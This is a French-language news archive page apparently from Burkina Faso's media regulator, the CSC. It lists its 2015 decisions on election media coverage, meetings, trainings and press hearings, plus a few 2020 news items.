Décision n° 2015- 0025/CSC/CAB du 04 Novembre 2015

05/11/2015

Décision n° 2015- 0025/CSC/CAB  portant émissions spéciales diffusées par la RTB et publications spéciales dans le quotidien Sidwaya dans le cadre des élections présidentielle et législatives couplées du 29 novembre 2015. 

Décision n° 2015- 0024/CSC/CAB du 03 Novembre 2015

05/11/2015

Décision n° 2015- 0024/CSC/CAB   portant respect des principes de pluralisme et d'équilibre de l'information par les médias privés nationaux et les médias internationaux pendant la campagne pour les élections présidentielle et législatives couplées du 29 novembre 2015

Décision n° 2015- 0023/CSC/CAB du 04 Novembre 2015

05/11/2015

Décision n° 2015- 0023/CSC/CAB   portant respect des principes d'égalité d'accès, de pluralisme et d'équilibre de l'information par les médias publics pendant la campagne pour les élections présidentielle et législatives couplées du 29 novembre 2015

Décision n° 2015 –0022/CSC du 29 Octobre 2015

04/11/2015

Décision n° 2015 –0022/CSC portant programmation des communications des partis, formations ou regroupements politiques ou de candidats indépendants prenant part aux élections présidentielle et législatives couplées

Décision n° 2015-21/CSC 26 Octobre 2015

26/10/2015

Décision  n° 2015-21/CSC portant règlementation de la couverture médiatique des activités des partis, formations et regroupements politiques de candidats indépendants du 15 octobre au 7 novembre 2015 inclus

LA CODEL AU CSC : Les élections couplées de 2015 au cœur des échanges

21/10/2015

La Présidente du Conseil supérieur de la communication, Mme Nathalie SOME a reçu, le mercredi 21 octobre 2015, la visite d'une délégation de la Convention des organisations de la société civile pour l'observation domestique des élections (CODEL), conduite par son président Halidou OUEDRAOGO.

Infos CSC n°001 de septembre 2015

20/10/2015

Infos CSC n°001 de septembre  2015

Appel du CSC à un traitement responsable des questions militaires et sécuritaires dans les médias et les réseaux sociaux

16/10/2015

Depuis les soubresauts consécutifs au putsch manqué du 16 septembre 2015, les questions militaires et sécuritaires occupent une place de choix dans les colonnes et programmes des médias

Infos CSC n°000 de août 2015

15/09/2015

Infos CSC n°000 de août 2015

Le CSC reçoit le Grand Chancelier des Ordres Burkinabè et sa délégation

27/08/2015

La Présidente du Conseil supérieur de la communication, Madame Nathalie SOME, entourée de quelques membres du collège des conseillers et de proches collaborateurs a reçu en visite, le jeudi 27 août 2015, le nouveau Grand- Chancelier des ordres Burkinabè, Monsieur Rock André COMPAORE et sa délégation.  

Couverture médiatique en période électorale Le CSC renforce la capacité des Responsables de média

26/08/2015

Dans la perspective d'une  bonne couverture médiatique des élections présidentielle et législatives au Burkina, le Conseil Supérieur de la Communication a organisé une rencontre d'échanges  avec les rédacteurs en chef et les chefs de programme des médias, le mardi 26 août 2015 à Ouagadougou, dans la salle de conférence du CBC. Objectif de cette rencontre : permettre aux responsables de média de mieux s'approprier les textes législatifs et règlementaires en vigueur.

Echéances électorales d’octobre 2015: Le CSC forme ses Conseillers, agents et représentants provinciaux pour l’appropriation des textes encadrant la gestion du discours politique

31/07/2015

Le Conseil supérieur de la communication organise une formation au profit des Conseillers, des agents ainsi que des représentants provinciaux, les 29 et 30 juillet 2015, au Centre national Cardinal Paul Zoungrana. Sous le thème « Contenu des documents électoraux et déroulement du processus électoral », cette formation permettra aux participants de s'approprier les textes législatifs et réglementaires encadrant le discours électoral et renforcera leurs capacités en matière de monitoring.   

Echéances électorales d’octobre 2015:Le CSC rappelle les dispositions régissant la couverture médiatique des activités des partis, formations ou regroupements politiques et des candidats indépendants au cour

17/06/2015

Réuni en session extraordinaire le 17 juin 2015, le Collège des conseillers du Conseil supérieur de la communication s'est penché sur les dispositions de l'article 68 et suivants de la loi n°005-2015/CNT du 7 avril 2015, portant modification de la loi n°014-2001/AN portant Code électoral dans la perspective des élections présidentielle et législatives couplées du 11 octobre 2015.

Séance d’auditions : Les journaux Mutations et l’Observateur Paalga ont été auditionnés.

16/06/2015

La commission spécialisée Ethique et déontologie du Collège des conseillers a entendu, le mardi 16 juin 2015, le journal Mutations et l'Observateur Paalga. Un citoyen reprochait au premier cité un article paru le 1er mai dernier qu'il juge diffamant à son égard. Le deuxième organe a été entendu pour avoir repris des propos de nature délictueux dans sa parution du 11 juin 2015.

Assemblée générale ordinaire : La Mutuelle du CSC fait son bilan

22/05/2015

La Mutuelle du Conseil supérieur de la communication (CSC) a tenu, le vendredi 22 mai 2015 dans la salle de conférences de l'institution,  son assemblée générale ordinaire  annuelle. A l'ordre du jour, les bilans moral et financier de 2014, la revue du programme d'activités de 2015 et le renouvèlement partiellement du bureau.

Communiqué de presse : Le Conseil Supérieur de la Communication forme ses cadres sur le rôle et la place des archives dans l’administration

19/05/2015

Le mardi 19 mai 2015, le personnel du Conseil supérieur de la communication (CSC) a bénéficié d'une formation sur le thème « Le rôle et la place des archives dans une administration : cas du CSC ». Une formation qui a été bien appréciée par les participants qui se sont sentis interpellés et sensibilisés sur l'importance des archives.

Etude d’audience des médias (Kadiogo et Houet)

28/08/2013

Etude d'audience de médias (Kadiogo et Houet)

Actualités

DECISION N°2020- 026/CSC portant réglementation de la couverture médiatique des activités politiques durant la période du 1er octobre 2020 à 00 heure au 30 octobre 2020 à vingt-quatre (24) heures inclus

01/09/2020

DECISION N°2020- 026 /CSC portant réglementation de la couverture médiatique des activités politiques durant la période du 1er octobre 2020 à 00 heure au 30 octobre 2020 à vingt-quatre (24) heures inclus

Audience : la Coordonnatrice du SIG chez le président TANKOANO

25/08/2020

Le président du Conseil supérieur de la communication (CSC), Maître Soahanla Mathias TANKOANO, a reçu, en cette matinée du 25 août 2020, la Coordonnatrice du Service d'information du gouvernement (SIG), Mafarma SANOGO. Le président avait à ses côtés le Directeur de cabinet, Boureima DIALLO, et la Chargée d'études, Pauline KANTIONO. La Coordonnatrice était accompagnée de Paul NAGALO, Chef du département communication internationale du SIG.

Le cadre de dialogue inter-partis (CDIP) reçu en audience par le Président du Conseil supérieur de la communication

20/08/2020

Une délégation du Secrétariat exécutif du CDIP a été reçue en audience à sa demande par le Président du CSC, Maître Soahanla Mathias Tankoano, entouré de ses collaborateurs, le mercredi 19 août 2020.

>> Voir toutes les actualités

newsletter
Newsletter

Sondage
Sondage indisponible.
Le CSC est membre
compteur site web